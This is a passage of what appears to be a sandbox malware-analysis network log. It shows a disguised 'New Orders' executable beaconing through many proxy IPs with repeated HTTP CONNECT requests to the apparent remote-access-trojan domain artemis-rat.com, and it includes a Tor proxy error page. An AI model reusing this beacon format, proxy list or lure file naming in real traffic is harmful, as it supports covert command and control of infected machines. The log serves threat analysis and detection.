                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1840192.168.2.952360128.199.187.21080007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.569200993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.911972046 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1841192.168.2.954419213.226.11.149418787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.569314003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:55.767978907 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1842192.168.2.95206737.18.73.6055667672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.569420099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.090653896 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1843192.168.2.952335162.214.170.144475587672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.572995901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632735014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633204937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633228064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742018938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1844192.168.2.952353192.163.200.93595247672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.573134899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1845192.168.2.952170172.93.213.177807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.592813015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1846192.168.2.953433199.102.107.14541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.594630003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1847192.168.2.952124194.4.50.61123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.594991922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1848192.168.2.95229692.204.134.38529297672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.595228910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1849192.168.2.952321131.186.37.9980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.596019030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1850192.168.2.95488472.206.181.12341457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.596465111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1851192.168.2.95236554.38.181.125807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.626255989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632740021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633210897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633260012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742019892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.741893053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:27.741879940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1852192.168.2.95232043.129.228.4678907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.626797915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:51.930915117 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1853192.168.2.952513192.163.202.88101857672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629638910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773264885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.773833036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1854192.168.2.95453043.155.142.116156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629692078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632749081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633210897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633261919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742021084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.745369911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.742043018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.820132971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1855192.168.2.95455045.171.242.380837672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629733086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.641942978 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1856192.168.2.954578146.19.106.193123347672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629784107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1857192.168.2.954583136.54.39.3481187672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629822969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.632869959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.633346081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.633251905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742031097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1858192.168.2.952251148.66.130.53133057672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.629935026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.773293972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.773828983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.773489952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.773091078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.773104906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:39.773125887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:03.773349047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:51.773194075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1859192.168.2.954569162.241.79.22520487672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:51.642321110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.741986990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:57.742091894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:03.741941929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:15.742018938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.745362997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
